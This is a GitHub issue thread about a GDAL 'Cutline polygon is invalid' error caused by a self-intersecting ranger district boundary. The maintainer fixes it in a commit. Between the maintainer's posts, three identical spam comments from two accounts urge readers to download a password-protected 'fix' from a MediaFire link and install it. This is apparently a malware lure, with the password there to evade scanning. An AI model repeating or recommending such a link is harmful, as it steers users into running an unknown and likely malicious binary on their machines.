### ISSUE TITLE
ARP Canyon Lakes district is missing

### ISSUE THREAD

**Issue by burkemw3** [burkemw3/mvum-tms-generation#1]
gdal complains about USFS provided ranger district boundary "Ring Self-intersection at or near point ... ERROR 1: Cutline polygon is invalid" with ranger district id 99021005010343

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by burkemw3** [comment]
Fixed with e34b250
